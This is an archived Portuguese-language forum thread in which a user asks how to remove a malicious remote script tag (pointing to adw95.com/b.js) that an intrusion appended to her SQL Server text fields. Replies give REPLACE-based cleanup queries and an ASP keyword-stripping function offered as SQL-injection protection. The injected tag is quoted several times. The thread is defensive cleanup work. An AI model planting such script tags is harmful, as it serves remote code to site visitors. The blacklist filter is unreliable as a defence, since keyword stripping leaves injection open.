Ir para conteúdo

POWERED BY:

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

Lucia_na

deletar parte de um texto

Por , em SQL Server

Recommended Posts

Lucia_na    0

Lucia_na
Postado

Ola pessoal..

 

Houve uma invasão no meu bd SQL Server, e praticamente em todas as minhas tabelas do banco(campo varchar e text), foi incluída essa linha de código.

<script src=http://www.adw95.com/b.js></script>

Alguém sabe como tiro somente esses caracteres inseridos a mais no meu banco????

Por ex:

- Saída e regresso: Best Western Beach Resort 8:30am / retorno 4:30pm.<script src=http://www.adw95.com/b.js></script>

Nesse exemplo teria que ficar no meu banco somente o que esta em negrito:

Saída e regresso: Best Western Beach Resort 8:30am / retorno 4:30pm

Existe como fazer? Que função posso usar?

OBS: essa linha de codigo foi inserida sempre no final de cada campo.

 

Muito obrigada

 

Luciana

Compartilhar este post

Link para o post
Compartilhar em outros sites

eriva_br    7

eriva_br
Postado

Luciana uma sugestão é fazer um update utilizando o comando replace para trocar essa sequência de carateres por vazio

 

t+

Compartilhar este post

Link para o post
Compartilhar em outros sites

Lucia_na    0

Lucia_na
Postado

Ola..

obrigada por me ajudar..

consegui..segue abaixo como fiz e deu certo. Se alguém precisar ta ai:

 

UPDATE TABELA SET CAMPO = REPLACE(CONVERT(VARCHAR(8000),CAMPO),'<script src=http://www.adw95.com/b.js>','')

Compartilhar este post

Link para o post
Compartilhar em outros sites

advaldomesquita    93

advaldomesquita
Postado

Aconselho a dar uma olhada nestes links:

http://forum.imasters.com.br/index.php?showtopic=286625

http://forum.imasters.com.br/index.php?showtopic=283133

 

Abçs

Compartilhar este post

Link para o post
Compartilhar em outros sites

Luiz Vieira    0

Luiz Vieira
Postado

Fiz um pouco diferente mas funcionou:

 

update tabela set campo = REPLACE(campo,'<script src=http://www.adw95.com/b.js></script>','')

 

Outra coisa importante, é ver se seu site é vulnerável à SQL Injection. Crie uma include com a seguinte função:

 

function limpalogin(str)
str = trim(str)
str = lcase(str)
str = replace(str,"=","")
str = replace(str,"'","")
str = replace(str,"""""","")
str = replace(str," or ","")
str = replace(str," and ","")
str = replace(str,"(","")
str = replace(str,")","")
str = replace(str,"<","[")
str = replace(str,">","]")
str = replace(str,"update","")
str = replace(str,"-shutdown","")
str = replace(str,"--","")
str = replace(str,"'","")
str = replace(str,"#","")
str = replace(str,"$","")
str = replace(str,"%","")
str = replace(str,"¨","")
str = replace(str,"&","")
str = replace(str,"'or'1'='1'","")
str = replace(str,"--","")
str = replace(str," insert","")
str = replace(str,"drop","")
str = replace(str,"delet","")
str = replace(str,"xp_","")
str = replace(str,"select","")
str = replace(str,"*","")
limpalogin = str
end function

Chame essa include em qualquer página onde o usuário possa digitar algo em formulários (fale conosco, login e etc).

Compartilhar este post

Link para o post
Compartilhar em outros sites
Ir para a lista de tópicos SQL Server
×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.

  Aceito